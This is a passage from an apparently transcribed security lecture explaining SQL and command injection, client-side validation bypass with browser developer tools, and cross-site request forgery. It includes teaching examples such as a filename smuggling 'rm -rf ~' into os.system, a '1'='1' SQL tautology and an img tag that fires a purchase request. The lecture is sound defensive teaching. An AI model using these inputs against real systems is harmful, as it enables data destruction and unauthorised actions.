are the two around the username and the two around the entire password here. 1134 00:59:42,258 --> 00:59:44,300 So the characters are still in there, but they've 1135 00:59:44,300 --> 00:59:48,440 been escaped, sanitized, or scrubbed, so to speak, in such the way 1136 00:59:48,440 --> 00:59:52,340 that now the database is smart enough not to mistake those for quotes 1137 00:59:52,340 --> 00:59:55,520 that should be matched with ones that we might have otherwise 1138 00:59:55,520 --> 00:59:56,750 written previously. 1139 00:59:56,750 --> 01:00:01,430 Now, there is another class of attacks that similarly involve injection 1140 01:00:01,430 --> 01:00:04,710 into your software, particularly command injection. 
1141 01:00:04,710 --> 01:00:07,580 Those of you familiar with a command-line interface 1142 01:00:07,580 --> 01:00:09,920 in the context of a terminal window or the like 1143 01:00:09,920 --> 01:00:12,560 might be familiar with how on a system you 1144 01:00:12,560 --> 01:00:15,620 type commands as opposed to always using your mouse to point 1145 01:00:15,620 --> 01:00:17,390 and click on menus and buttons. 1146 01:00:17,390 --> 01:00:20,000 The problem with command injection is that it's all 1147 01:00:20,000 --> 01:00:22,820 too easy in a lot of today's programming languages 1148 01:00:22,820 --> 01:00:27,480 to write code that invokes commands on systems, 1149 01:00:27,480 --> 01:00:31,880 whether it's to copy files, delete files, move files, execute 1150 01:00:31,880 --> 01:00:33,320 other commands altogether. 1151 01:00:33,320 --> 01:00:35,540 And that's because a lot of programming languages 1152 01:00:35,540 --> 01:00:40,610 come with functions that has a feature called system, which is literally 1153 01:00:40,610 --> 01:00:45,020 a feature of some programming languages that allow you in your program 1154 01:00:45,020 --> 01:00:48,170 to execute a command on the underlying system, a command 1155 01:00:48,170 --> 01:00:49,820 and the underlying operating system. 1156 01:00:49,820 --> 01:00:53,270 And that might be useful for you because in addition 1157 01:00:53,270 --> 01:00:55,820 to writing your own code in some higher-level language, 1158 01:00:55,820 --> 01:00:59,300 you can occasionally run a command on the system itself. 1159 01:00:59,300 --> 01:01:02,060 But the problem is that if you, the programmer, 1160 01:01:02,060 --> 01:01:07,070 somehow take user input and you just blindly pass that user's input 1161 01:01:07,070 --> 01:01:10,550 to the command line, so to speak-- to the terminal window, 1162 01:01:10,550 --> 01:01:12,350 to the underlying operating system-- 1163 01:01:12,350 --> 01:01:16,580 that is yet another context in which potentially dangerous characters, 1164 01:01:16,580 --> 01:01:21,500 like semicolons or the like, could accidentally finish your thought 1165 01:01:21,500 --> 01:01:24,470 but then start a completely new one from the adversary 1166 01:01:24,470 --> 01:01:27,860 so that they, too, on your system can not only 1167 01:01:27,860 --> 01:01:30,320 delete things like data from your database, 1168 01:01:30,320 --> 01:01:32,780 but even files from your file system. 1169 01:01:32,780 --> 01:01:36,020 They could perhaps send email or spam or do anything 1170 01:01:36,020 --> 01:01:39,830 in a command-line environment that you yourself could do on the same. 1171 01:01:39,830 --> 01:01:42,080 In other programming languages, the same idea 1172 01:01:42,080 --> 01:01:45,230 exists in the context of another function called eval, 1173 01:01:45,230 --> 01:01:48,410 which evaluates whatever you pass to it. 1174 01:01:48,410 --> 01:01:52,370 So there, too-- if you're in the habit of using system or eval, 1175 01:01:52,370 --> 01:01:58,130 taking user input, and passing that user input as part of the input to system 1176 01:01:58,130 --> 01:02:02,210 or eval without having sanitized it or scrubbed it or, more generally, 1177 01:02:02,210 --> 01:02:04,970 "escaped" potentially dangerous characters, 1178 01:02:04,970 --> 01:02:10,550 you're putting your entire system at risk and any and all software that's 1179 01:02:10,550 --> 01:02:13,440 installed on or running on the same. 1180 01:02:13,440 --> 01:02:14,930 So what's the solution here? 
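Concretely, the dangerous pattern, and a preview of one common remedy, might look like this in Python; os.system and subprocess are real standard-library modules, but the zip command and filename here are just for the sake of illustration:

    import os
    import subprocess

    def compress_unsafe(filename):
        # DANGEROUS: input like "notes.txt; rm -rf ~" becomes two shell commands.
        os.system(f"zip archive.zip {filename}")

    def compress_safer(filename):
        # The filename is passed as a single argument and no shell is involved,
        # so semicolons and the like have no special meaning.
        subprocess.run(["zip", "archive.zip", filename], check=True)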
1181 01:02:14,930 --> 01:02:17,240 In any of those programming languages to which 1182 01:02:17,240 --> 01:02:19,850 I'm alluding that have functions like system or eval-- 1183 01:02:19,850 --> 01:02:23,170 they almost always come with another function 1184 01:02:23,170 --> 01:02:27,110 or built into these functions a way of escaping the user's input. 1185 01:02:27,110 --> 01:02:30,610 So I would always take care to read the documentation if you yourself 1186 01:02:30,610 --> 01:02:35,620 are or want to become a programmer, that whenever you take user input, 1187 01:02:35,620 --> 01:02:38,560 you always figure out and think to yourself, wait a minute, 1188 01:02:38,560 --> 01:02:41,770 how can I escape this properly so that I can't 1189 01:02:41,770 --> 01:02:48,400 be tricked into executing some command, some SQL, or some HTML and JavaScript 1190 01:02:48,400 --> 01:02:50,772 within my own software? 1191 01:02:50,772 --> 01:02:51,980 All right, that's been a lot. 1192 01:02:51,980 --> 01:02:54,022 Let's go ahead here and take a five-minute break. 1193 01:02:54,022 --> 01:02:56,800 And when we resume, we'll look at a whole other category 1194 01:02:56,800 --> 01:03:00,000 of potential attacks on software. 1195 01:03:00,000 --> 01:03:01,570 All right, we're back. 1196 01:03:01,570 --> 01:03:05,040 Let's go ahead and return to this world of HTML on the web, 1197 01:03:05,040 --> 01:03:08,430 if only because so much of today's software is actually web based. 1198 01:03:08,430 --> 01:03:10,920 And indeed, even on your Macs or PCs or phones, 1199 01:03:10,920 --> 01:03:13,690 what looks like a native application, so to speak, 1200 01:03:13,690 --> 01:03:16,320 might actually still be implemented in HTML 1201 01:03:16,320 --> 01:03:18,840 with that other language, JavaScript and CSS. 1202 01:03:18,840 --> 01:03:21,030 Well, it turns out, in the context of a browser, 1203 01:03:21,030 --> 01:03:23,652 there's very often a feature called developer tools. 1204 01:03:23,652 --> 01:03:26,110 And indeed, if you've done any web development of your own, 1205 01:03:26,110 --> 01:03:27,540 you might have played with this feature. 1206 01:03:27,540 --> 01:03:30,748 And these developer tools, which might be called something slightly different 1207 01:03:30,748 --> 01:03:33,750 across different browsers, allow you to poke around 1208 01:03:33,750 --> 01:03:38,760 the HTML, the CSS, and the JavaScript that compose some web page either 1209 01:03:38,760 --> 01:03:41,310 that you yourself have made or that someone else has made 1210 01:03:41,310 --> 01:03:44,340 and you have downloaded or accessed via your own browser. 1211 01:03:44,340 --> 01:03:49,020 Let's consider now, though, what you can do if you have access 1212 01:03:49,020 --> 01:03:50,680 to these developer tools. 1213 01:03:50,680 --> 01:03:53,490 So, for instance, here is some HTML using 1214 01:03:53,490 --> 01:03:57,310 a tag called input, which would create a checkbox on a website. 1215 01:03:57,310 --> 01:04:01,000 We haven't seen this one yet, but it's similar in spirit to the paragraph tag 1216 01:04:01,000 --> 01:04:05,320 and the anchor tag, in which case it is interpreted as the browser as meaning, 1217 01:04:05,320 --> 01:04:07,208 hey, browser, here comes a checkbox. 
1218 01:04:07,208 --> 01:04:09,250 The only thing different that's worth noting here 1219 01:04:09,250 --> 01:04:13,270 is that some HTML tags don't actually need a close tag, 1220 01:04:13,270 --> 01:04:16,240 because whereas a paragraph starts somewhere 1221 01:04:16,240 --> 01:04:19,450 and then ends somewhere else after some number of words, 1222 01:04:19,450 --> 01:04:22,010 a checkbox is either there or it isn't there, 1223 01:04:22,010 --> 01:04:25,480 so there's really no conceptual notion of it starting and stopping. 1224 01:04:25,480 --> 01:04:29,380 So some HTML tags don't even need end tags or close tags. 1225 01:04:29,380 --> 01:04:31,010 This, then, is one of them. 1226 01:04:31,010 --> 01:04:35,350 This, then, is an input tag that gives us a type of input, namely, a checkbox. 1227 01:04:35,350 --> 01:04:40,630 And another curiosity about this is that some HTML attributes don't need values. 1228 01:04:40,630 --> 01:04:44,870 We saw the href attribute for the anchor tag earlier, and that, of course, 1229 01:04:44,870 --> 01:04:45,550 had a value. 1230 01:04:45,550 --> 01:04:48,280 In quotes was the URL that you want to link to. 1231 01:04:48,280 --> 01:04:50,980 Here, we see that same paradigm-- type equals, quote unquote, 1232 01:04:50,980 --> 01:04:55,090 checkbox to give us specifically a checkbox type of input. 1233 01:04:55,090 --> 01:04:59,170 But you'll also notice here another attribute specifically for this input 1234 01:04:59,170 --> 01:05:01,240 tag that's literally called disabled. 1235 01:05:01,240 --> 01:05:04,570 And strictly speaking, you don't need to give it a value, 1236 01:05:04,570 --> 01:05:06,590 because it's either there or it isn't. 1237 01:05:06,590 --> 01:05:09,970 And if it is there, that just means that this checkbox is exactly 1238 01:05:09,970 --> 01:05:13,720 that, disabled, which means you can see it, but it's not checked, 1239 01:05:13,720 --> 01:05:15,550 and you can't actually check it. 1240 01:05:15,550 --> 01:05:19,180 It's disabled and lightly grayed out, typically, on a browser. 1241 01:05:19,180 --> 01:05:20,612 So why might this be? 1242 01:05:20,612 --> 01:05:22,570 Well, maybe there's some feature in the browser 1243 01:05:22,570 --> 01:05:25,150 that you don't want to give some users access to. 1244 01:05:25,150 --> 01:05:28,240 Maybe based on who has logged in, they should or should not 1245 01:05:28,240 --> 01:05:30,040 have access to some feature. 1246 01:05:30,040 --> 01:05:34,480 The problem, though, with HTML and CSS and JavaScript 1247 01:05:34,480 --> 01:05:38,410 or really anything that is web based or using those languages 1248 01:05:38,410 --> 01:05:44,590 is that you're sending this HTML to the user's own device, 1249 01:05:44,590 --> 01:05:48,490 to their browser on their phone or laptop or desktop, 1250 01:05:48,490 --> 01:05:53,860 which means they can not only see this HTML code, but theoretically, 1251 01:05:53,860 --> 01:05:54,820 they can edit it. 1252 01:05:54,820 --> 01:05:58,660 They can't edit it on the server, because that's your own copy, assuming 1253 01:05:58,660 --> 01:06:00,100 they can't hack into the server. 1254 01:06:00,100 --> 01:06:02,900 But they can edit their own copy thereof. 1255 01:06:02,900 --> 01:06:04,762 Now, usually, that's not such a big deal, 1256 01:06:04,762 --> 01:06:06,470 because what's the worst that can happen? 1257 01:06:06,470 --> 01:06:11,260 They can hack themselves by changing HTML on their own computer or phone. 
1258 01:06:11,260 --> 01:06:15,940 But it is problematic if you are using HTML or even 1259 01:06:15,940 --> 01:06:21,040 JavaScript to try to prevent certain user interactions with your server. 1260 01:06:21,040 --> 01:06:24,070 So, for instance, if you simply don't want a user 1261 01:06:24,070 --> 01:06:27,700 to be able to check this box so that when they submit a form, 1262 01:06:27,700 --> 01:06:30,580 they're not agreeing to something, or they're adding something 1263 01:06:30,580 --> 01:06:33,820 to their shopping cart by using this checkbox, 1264 01:06:33,820 --> 01:06:37,420 well, you might rely therefore on this HTML attribute, disabled. 1265 01:06:37,420 --> 01:06:42,100 Just prevent them on the client, in the browser, from checking this box. 1266 01:06:42,100 --> 01:06:44,770 But it turns out, with developer tools, which 1267 01:06:44,770 --> 01:06:47,980 are accessible usually via menu at the top of the screen 1268 01:06:47,980 --> 01:06:50,770 or by right-clicking or Control-clicking on a web page 1269 01:06:50,770 --> 01:06:55,450 and then selecting an option, a user with access to HTML 1270 01:06:55,450 --> 01:06:59,290 can change any and all of that HTML on their own computer, which 1271 01:06:59,290 --> 01:07:02,290 means they could just remove this disabled attribute put 1272 01:07:02,290 --> 01:07:05,020 in their own copy of your HTML on their computer 1273 01:07:05,020 --> 01:07:09,250 and effectively enable that checkbox by getting rid of it. 1274 01:07:09,250 --> 01:07:10,580 Now, what does this mean? 1275 01:07:10,580 --> 01:07:12,490 Well, there's no problem yet. 1276 01:07:12,490 --> 01:07:16,690 But if they do now check that checkbox, and you didn't want them to be able to, 1277 01:07:16,690 --> 01:07:19,480 and they submit the checkbox to the server, 1278 01:07:19,480 --> 01:07:24,130 as by clicking a submit button in a web form, you on the server, 1279 01:07:24,130 --> 01:07:27,970 if you're not paranoid enough, might just 1280 01:07:27,970 --> 01:07:31,750 trust that if I see a checked box being submitted via form, 1281 01:07:31,750 --> 01:07:35,260 they must have been allowed to do it, so I will trust them, but no. 1282 01:07:35,260 --> 01:07:39,440 Here, too, is an example of where you should never trust user's input, 1283 01:07:39,440 --> 01:07:42,670 because if you're trying to disable them from doing something on the client, 1284 01:07:42,670 --> 01:07:44,410 they don't have to respect that. 1285 01:07:44,410 --> 01:07:48,730 They can override the HTML in their own browser, remove any such defenses, 1286 01:07:48,730 --> 01:07:51,130 and then send the checkbox to you anyway. 1287 01:07:51,130 --> 01:07:54,250 The takeaway here then is that you really should never 1288 01:07:54,250 --> 01:07:57,280 rely on client-side validation alone. 1289 01:07:57,280 --> 01:07:59,450 And this disabled attribute is just one more 1290 01:07:59,450 --> 01:08:03,080 minor incarnation of that, where you're relying on the client 1291 01:08:03,080 --> 01:08:07,400 to ensure that the checkbox is disabled, and its value 1292 01:08:07,400 --> 01:08:09,350 can't be sent to the server. 
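What that server-side counterpart might look like is roughly this, assuming a hypothetical Flask route with invented field names; the point is only that the server re-checks the value no matter what the browser claimed to enforce:

    from flask import Flask, request, abort

    app = Flask(__name__)

    def feature_enabled_for(user):
        # Hypothetical permission check; a real app would consult the
        # database, the user's role, or the like.
        return False

    @app.route("/order", methods=["POST"])
    def order():
        # Never assume the browser honored a disabled (or required) attribute;
        # re-check on the server whether this box may actually be checked.
        box_checked = request.form.get("addon") is not None
        if box_checked and not feature_enabled_for("current user"):
            abort(403)
        return "OK"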
1293 01:08:09,350 --> 01:08:12,980 But client-side validation is really on the honor system 1294 01:08:12,980 --> 01:08:15,950 only, because if someone knows how to use these developer tools 1295 01:08:15,950 --> 01:08:20,149 and removes the disabled attribute, or if they know how to use developer tools 1296 01:08:20,149 --> 01:08:25,220 and maybe disable JavaScript altogether for your website on their computer, 1297 01:08:25,220 --> 01:08:29,689 any form of client-side validation in HTML or JavaScript 1298 01:08:29,689 --> 01:08:33,380 that you wrote on the server but that your server sent to their browser 1299 01:08:33,380 --> 01:08:36,200 and that's therefore executed by their browser 1300 01:08:36,200 --> 01:08:39,270 is vulnerable to simply being turned off. 1301 01:08:39,270 --> 01:08:42,200 So the catch is that even though client-side validation tends 1302 01:08:42,200 --> 01:08:44,870 to be nice in terms of user experience-- the button 1303 01:08:44,870 --> 01:08:47,930 is obviously disabled, so I should not be able to click on it. 1304 01:08:47,930 --> 01:08:50,750 Or my email address is improperly formatted, 1305 01:08:50,750 --> 01:08:52,819 so I should not be allowed to submit the form. 1306 01:08:52,819 --> 01:08:56,689 Any forms of client-side validation tend to give the user immediate 1307 01:08:56,689 --> 01:08:59,420 and often very useful visual feedback. 1308 01:08:59,420 --> 01:09:02,510 But if it's not accompanied, this client-side validation, 1309 01:09:02,510 --> 01:09:06,140 by server-side validation, your server software 1310 01:09:06,140 --> 01:09:09,180 is still vulnerable to attack in some way. 1311 01:09:09,180 --> 01:09:12,979 So what else might-- what other form might this take? 1312 01:09:12,979 --> 01:09:16,370 Well, here's another example of an HTML input. 1313 01:09:16,370 --> 01:09:19,970 This time, it's of type text, which means that the text box on the field. 1314 01:09:19,970 --> 01:09:23,930 Suppose that you really want them to provide that value. 1315 01:09:23,930 --> 01:09:26,210 Maybe this text box represents the user's name 1316 01:09:26,210 --> 01:09:29,340 or their email address or their password or something like that. 1317 01:09:29,340 --> 01:09:32,300 And so if you know a little bit of HTML, you 1318 01:09:32,300 --> 01:09:35,029 know that there's not only a disabled attribute available to you, 1319 01:09:35,029 --> 01:09:36,547 but also a required attribute. 1320 01:09:36,547 --> 01:09:38,630 And it doesn't have an equal sign or a quote mark. 1321 01:09:38,630 --> 01:09:39,529 You don't need that. 1322 01:09:39,529 --> 01:09:42,260 It suffices just to say this input is required. 1323 01:09:42,260 --> 01:09:45,670 But the catch here is, too, if a user doesn't want to give you a name, 1324 01:09:45,670 --> 01:09:47,420 doesn't want to give you an email address, 1325 01:09:47,420 --> 01:09:50,060 doesn't want to give you a password or some other value, 1326 01:09:50,060 --> 01:09:52,279 well, they can use these so-called developer tools, 1327 01:09:52,279 --> 01:09:55,700 click a button on their browser, remove the required attribute, 1328 01:09:55,700 --> 01:09:59,447 and, voila, now they do not need to submit that value. 1329 01:09:59,447 --> 01:10:01,280 Now, that in and of itself is not a problem, 1330 01:10:01,280 --> 01:10:03,322 because again, they're only "hacking themselves." 
1331 01:10:03,322 --> 01:10:07,310 But if they're then allowed to submit this form to your server, 1332 01:10:07,310 --> 01:10:12,680 and your server just trusts or assumes that every user will send you 1333 01:10:12,680 --> 01:10:16,010 a username, an email address, a password, or the like, 1334 01:10:16,010 --> 01:10:21,050 that's where things can break, if you're trusting client-side validation alone 1335 01:10:21,050 --> 01:10:25,500 to ensure that the user's input is as expected. 1336 01:10:25,500 --> 01:10:27,950 So if they're allowed to get rid of something 1337 01:10:27,950 --> 01:10:31,430 as simple as this required attribute, effectively making the input like this, 1338 01:10:31,430 --> 01:10:33,420 you might be missing some value. 1339 01:10:33,420 --> 01:10:38,270 And so you must therefore use server-side validation again. 1340 01:10:38,270 --> 01:10:40,133 And we won't get into the particulars of how 1341 01:10:40,133 --> 01:10:42,050 you do this, because it will completely depend 1342 01:10:42,050 --> 01:10:45,380 on the type of server software you're using, the programming language 1343 01:10:45,380 --> 01:10:46,160 that you're using. 1344 01:10:46,160 --> 01:10:49,760 And so it's really the principle today that's important that client-side 1345 01:10:49,760 --> 01:10:54,470 validation, whereby the browser or the user's own copy of your software tries 1346 01:10:54,470 --> 01:10:58,910 to preempt mistakes and require or disable certain inputs-- 1347 01:10:58,910 --> 01:10:59,720 that's fine. 1348 01:10:59,720 --> 01:11:03,740 That tends to give good, immediate, useful user feedback. 1349 01:11:03,740 --> 01:11:09,330 But it must still be always accompanied by server-side validation 1350 01:11:09,330 --> 01:11:15,110 so that you have the final say over what the user input looks like 1351 01:11:15,110 --> 01:11:19,100 and if and how it's actually stored into your system. 1352 01:11:19,100 --> 01:11:21,920 Again, the particulars of how you do one or the other 1353 01:11:21,920 --> 01:11:26,570 is the topic for an actual programming class or a class on web development 1354 01:11:26,570 --> 01:11:27,450 specifically. 1355 01:11:27,450 --> 01:11:29,030 But for now, it's this principle. 1356 01:11:29,030 --> 01:11:31,490 Just because you have client-side validation 1357 01:11:31,490 --> 01:11:34,928 doesn't mean you shouldn't also have server-side validation. 1358 01:11:34,928 --> 01:11:37,220 And, in fact, if you've got to choose one or the other, 1359 01:11:37,220 --> 01:11:39,740 always choose server-side validation. 1360 01:11:39,740 --> 01:11:43,160 Client-side validation is really just icing on the cake. 1361 01:11:43,160 --> 01:11:47,480 It adds to the experience, but it's not the prerequisite one. 1362 01:11:47,480 --> 01:11:51,320 Questions, then, on these so-called developer tools 1363 01:11:51,320 --> 01:11:57,410 or these kinds of threats when it comes to validating the user's input? 1364 01:11:57,410 --> 01:12:00,020 AUDIENCE: Yeah, so my question is more related to SQL 1365 01:12:00,020 --> 01:12:01,580 and command injections for a second. 1366 01:12:01,580 --> 01:12:07,310 Isn't it really easy to just not run the user's commands with admin or root 1367 01:12:07,310 --> 01:12:10,270 privileges to delete certain records from a database or something? 1368 01:12:10,270 --> 01:12:12,020 DAVID J. 
MALAN: Yes, another defense would 1369 01:12:12,020 --> 01:12:14,420 be to make sure that whatever username you're 1370 01:12:14,420 --> 01:12:18,920 using to execute these SQL commands does not have the ability to delete anything 1371 01:12:18,920 --> 01:12:19,620 at all. 1372 01:12:19,620 --> 01:12:23,480 However, some threats only need select access. 1373 01:12:23,480 --> 01:12:26,930 So the second example I showed you, whereby we tricked the database 1374 01:12:26,930 --> 01:12:30,440 into just selecting * from users WHERE '1' = '1'-- 1375 01:12:30,440 --> 01:12:33,890 that was an example of one where, permission-wise, it probably 1376 01:12:33,890 --> 01:12:37,040 would work, and it might allow the adversary still to log in. 1377 01:12:37,040 --> 01:12:41,460 But your suggestion is a good one as an additional defense, not an alternative. 1378 01:12:41,460 --> 01:12:45,650 Let's consider another class of attack to which your code might be vulnerable 1379 01:12:45,650 --> 01:12:48,860 if it's on a server using the same language, HTML-- 1380 01:12:48,860 --> 01:12:52,190 namely, Cross-Site Request Forgeries, or CSRFs. 1381 01:12:52,190 --> 01:12:54,980 So this one's more of a mouthful, but it too 1382 01:12:54,980 --> 01:12:59,700 relates to a mistake you might otherwise make when writing software on a server 1383 01:12:59,700 --> 01:13:02,190 if you're not already familiar with this kind of threat. 1384 01:13:02,190 --> 01:13:07,350 So first, HTTP, recall, is this protocol, this convention by which 1385 01:13:07,350 --> 01:13:09,240 web browsers and servers communicate. 1386 01:13:09,240 --> 01:13:12,780 Well, it turns out there's different ways that browsers can get information 1387 01:13:12,780 --> 01:13:13,720 to a server. 1388 01:13:13,720 --> 01:13:17,070 And one of those ways is literally called GET by convention. 1389 01:13:17,070 --> 01:13:19,470 In other words, inside of that virtual envelope 1390 01:13:19,470 --> 01:13:24,360 is typically literally this word, GET, followed by the file name 1391 01:13:24,360 --> 01:13:26,370 that the browser wants to get from a server. 1392 01:13:26,370 --> 01:13:28,560 But more importantly for our purposes is that 1393 01:13:28,560 --> 01:13:31,890 whenever using this GET method to send information 1394 01:13:31,890 --> 01:13:36,510 to a server, all of the information that you want to get is embedded in the URL 1395 01:13:36,510 --> 01:13:37,510 itself. 1396 01:13:37,510 --> 01:13:38,530 So what does that mean? 1397 01:13:38,530 --> 01:13:41,310 Well, consider, for instance, this sample link in HTML. 1398 01:13:41,310 --> 01:13:43,020 Here's my anchor tag beginning. 1399 01:13:43,020 --> 01:13:44,700 Here's my anchor tag ending. 1400 01:13:44,700 --> 01:13:47,490 Notice here is the text "Buy Now." 1401 01:13:47,490 --> 01:13:50,190 Well, let's suppose that you're in the US here. 1402 01:13:50,190 --> 01:13:52,380 And on amazon.com in the US, there's actually 1403 01:13:52,380 --> 01:13:54,780 this feature where you can "buy now." 1404 01:13:54,780 --> 01:13:58,290 That is to say, when you visit the page of a product on Amazon's website 1405 01:13:58,290 --> 01:14:02,080 in the US, if not beyond, you can skip the steps 1406 01:14:02,080 --> 01:14:04,300 of having to add an item to your shopping cart 1407 01:14:04,300 --> 01:14:06,733 and check out and choose your payment method 1408 01:14:06,733 --> 01:14:09,400 and then, some number of clicks later, actually buy the product.
1409 01:14:09,400 --> 01:14:12,370 Rather, if you configure your account in advance, 1410 01:14:12,370 --> 01:14:15,940 you can go to any product's page, literally click a link or a button 1411 01:14:15,940 --> 01:14:18,100 that says "Buy Now," and that's it. 1412 01:14:18,100 --> 01:14:20,140 In a single click, for better or for worse, 1413 01:14:20,140 --> 01:14:22,610 that product will be shipped to your home. 1414 01:14:22,610 --> 01:14:24,537 So how might Amazon be implementing this? 1415 01:14:24,537 --> 01:14:26,620 Well, they might indeed be using a link like this, 1416 01:14:26,620 --> 01:14:38,560 the href value of which is a URL, like https://www.amazon.com/dp/B07XLQ2FSK. 1417 01:14:38,560 --> 01:14:44,110 In other words, that seems to be enough information in the URL alone 1418 01:14:44,110 --> 01:14:47,560 via which to buy the product whose unique identifier is apparently 1419 01:14:47,560 --> 01:14:49,317 that string of text at the end. 1420 01:14:49,317 --> 01:14:51,400 Now, that's all fine and good, and that actually 1421 01:14:51,400 --> 01:14:56,320 seems very user friendly, because with a single click on Buy Now, 1422 01:14:56,320 --> 01:14:58,270 I can indeed buy that product. 1423 01:14:58,270 --> 01:15:02,140 But the danger here is that this link might be not just 1424 01:15:02,140 --> 01:15:05,890 on amazon.com but in some adversary's website 1425 01:15:05,890 --> 01:15:08,530 or maybe in an email that is sent to you. 1426 01:15:08,530 --> 01:15:14,140 If it's that easy to buy something now, you could trick someone, potentially, 1427 01:15:14,140 --> 01:15:17,830 into buying things that they didn't actually intend in this case, 1428 01:15:17,830 --> 01:15:21,340 or doing anything else on a web server into which they're already 1429 01:15:21,340 --> 01:15:26,900 logged in if GET is the method being used to get something from that server. 1430 01:15:26,900 --> 01:15:31,220 Well, why is it, exactly, that this URL is problematic? 1431 01:15:31,220 --> 01:15:34,900 Well, consider, for instance, the following HTML instead. 1432 01:15:34,900 --> 01:15:37,630 Suppose that you visit the site of an adversary who 1433 01:15:37,630 --> 01:15:42,430 just likes to create havoc in the world, and that adversary's site doesn't even 1434 01:15:42,430 --> 01:15:45,670 have an anchor tag or a link that they want to trick you into clicking. 1435 01:15:45,670 --> 01:15:48,820 So it's not even as deliberate as a phishing attack 1436 01:15:48,820 --> 01:15:50,470 that they want you to click some link. 1437 01:15:50,470 --> 01:15:55,420 Suppose they're using something like an image tag, which it turns out in HTML, 1438 01:15:55,420 --> 01:15:58,630 img for short, is how you embed an image on a web page. 1439 01:15:58,630 --> 01:16:00,280 And how do you specify what image? 1440 01:16:00,280 --> 01:16:04,390 You specify the source thereof, src for short, the value of which 1441 01:16:04,390 --> 01:16:08,470 can be the URL of or the name of the image you want to display. 1442 01:16:08,470 --> 01:16:13,630 But strictly speaking, that URL doesn't have to actually lead to an image. 1443 01:16:13,630 --> 01:16:17,080 It could actually lead to an Amazon product page. 1444 01:16:17,080 --> 01:16:19,540 But the way images work on web pages, recall, 1445 01:16:19,540 --> 01:16:23,830 is that, typically, when you visit a web page, the images automatically load.
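For instance, the adversary's page might contain nothing more than this (a sketch, reusing the hypothetical product URL from above):

    <!-- Not an image at all, but the browser will still request the URL automatically -->
    <img src="https://www.amazon.com/dp/B07XLQ2FSK">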
1446 01:16:23,830 --> 01:16:27,280 You don't have to click or do anything, typically, for the images 1447 01:16:27,280 --> 01:16:29,277 to appear on a web page-- maybe in emails, 1448 01:16:29,277 --> 01:16:30,860 and that's an anti-phishing mechanism. 1449 01:16:30,860 --> 01:16:34,000 But in web pages, you typically don't have to click on anything 1450 01:16:34,000 --> 01:16:35,050 to see the images. 1451 01:16:35,050 --> 01:16:37,840 That is to say, the value of the source attributes 1452 01:16:37,840 --> 01:16:41,540 are just automatically downloaded and displayed to the user. 1453 01:16:41,540 --> 01:16:44,740 Now, this, in fairness, is not an image. 1454 01:16:44,740 --> 01:16:48,680 But the browser doesn't necessarily know that from the get-go. 1455 01:16:48,680 --> 01:16:53,680 And so if this HTML is in some adversary's website that you've somehow 1456 01:16:53,680 --> 01:16:56,410 been tricked into visiting, and you don't even click a link-- 1457 01:16:56,410 --> 01:16:58,180 you just visit that web page-- 1458 01:16:58,180 --> 01:17:01,442 that means this image tag is going to try to download this source. 1459 01:17:01,442 --> 01:17:03,400 And even though it's not going to get an image, 1460 01:17:03,400 --> 01:17:06,770 it is going to buy that product for you. 1461 01:17:06,770 --> 01:17:07,480 Why? 1462 01:17:07,480 --> 01:17:10,210 Because if you're logged into your Amazon account, 1463 01:17:10,210 --> 01:17:15,130 even though this is in another tab, it's as though your browser requested 1464 01:17:15,130 --> 01:17:18,670 that URL via that "GET" method because all 1465 01:17:18,670 --> 01:17:24,100 of the relevant information for buying that product is in the URL alone. 1466 01:17:24,100 --> 01:17:27,460 So it turns out that using GET is actually 1467 01:17:27,460 --> 01:17:32,260 not a good thing when it comes to changing state on the server. 1468 01:17:32,260 --> 01:17:35,590 To get technical, the GET method is meant to be "safe," 1469 01:17:35,590 --> 01:17:41,660 safe whereby it does not change any state or values on the server. 1470 01:17:41,660 --> 01:17:44,290 So it would actually be incorrect, or definitely 1471 01:17:44,290 --> 01:17:48,160 bad practice by Amazon, if they were implementing their Buy Now 1472 01:17:48,160 --> 01:17:53,680 button simply with a simple URL and a simple GET request. 1473 01:17:53,680 --> 01:17:58,360 It should not be that easy to buy things on the internet, let alone change state 1474 01:17:58,360 --> 01:17:59,890 on a server in other ways. 1475 01:17:59,890 --> 01:18:02,520 So there are, thankfully, other methods, but even 1476 01:18:02,520 --> 01:18:05,070 these are potentially vulnerable to this kind of attack. 1477 01:18:05,070 --> 01:18:06,960 There's a POST method, which is typically 1478 01:18:06,960 --> 01:18:11,400 used by browsers when you want to post your credit card information 1479 01:18:11,400 --> 01:18:12,900 or your password to a server. 1480 01:18:12,900 --> 01:18:15,900 You don't want your credit card-- you don't want your password typically 1481 01:18:15,900 --> 01:18:19,980 ending up in the URL of your browser for privacy's sake. 1482 01:18:19,980 --> 01:18:22,500 So rather, POST will kind of hide it more deeply 1483 01:18:22,500 --> 01:18:24,930 in that virtual envelope to which we keep alluding. 1484 01:18:24,930 --> 01:18:28,470 POST might also be used if you want to upload images or video files 1485 01:18:28,470 --> 01:18:31,920 to a server because those don't really fit in URLs, it would seem. 
1486 01:18:31,920 --> 01:18:37,230 And so POST is an alternative that is meant to change state on the server, 1487 01:18:37,230 --> 01:18:39,580 for instance, buy products for you. 1488 01:18:39,580 --> 01:18:41,430 But even this can perhaps be abused. 1489 01:18:41,430 --> 01:18:43,020 Well, let's take a look how. 1490 01:18:43,020 --> 01:18:46,500 Here is now some HTML-- and it's more HTML than we've seen thus far, 1491 01:18:46,500 --> 01:18:49,200 but we'll wrap our minds around each piece of it-- 1492 01:18:49,200 --> 01:18:53,370 that represents an alternative implementation 1493 01:18:53,370 --> 01:18:56,280 of the Buy Now button on Amazon that's no longer 1494 01:18:56,280 --> 01:19:01,200 a simple anchor tag with everything that's needed in the URL. 1495 01:19:01,200 --> 01:19:03,510 This is more of a traditional web form. 1496 01:19:03,510 --> 01:19:06,510 And it's fine if the form is super short and only has a single button. 1497 01:19:06,510 --> 01:19:08,740 It doesn't need text fields or anything like that. 1498 01:19:08,740 --> 01:19:10,150 But there's a lot going on here. 1499 01:19:10,150 --> 01:19:10,990 So let's see. 1500 01:19:10,990 --> 01:19:13,800 So here's the form tag, the opening tag. 1501 01:19:13,800 --> 01:19:14,940 Here's the close tag. 1502 01:19:14,940 --> 01:19:17,520 So everything in between must be implementing this form. 1503 01:19:17,520 --> 01:19:20,190 The action of this form, I claim, is going 1504 01:19:20,190 --> 01:19:24,480 to be to submit the information to this amazon.com URL here. 1505 01:19:24,480 --> 01:19:27,450 But the method that we're going to use is explicitly POST. 1506 01:19:27,450 --> 01:19:30,420 So it turns out, in an HTML form, if you don't specify a method, 1507 01:19:30,420 --> 01:19:32,940 it will use GET by default. So explicitly, I'm 1508 01:19:32,940 --> 01:19:36,720 at least using POST because I don't want everything to be in the URL alone. 1509 01:19:36,720 --> 01:19:39,210 Well, I've got two inputs 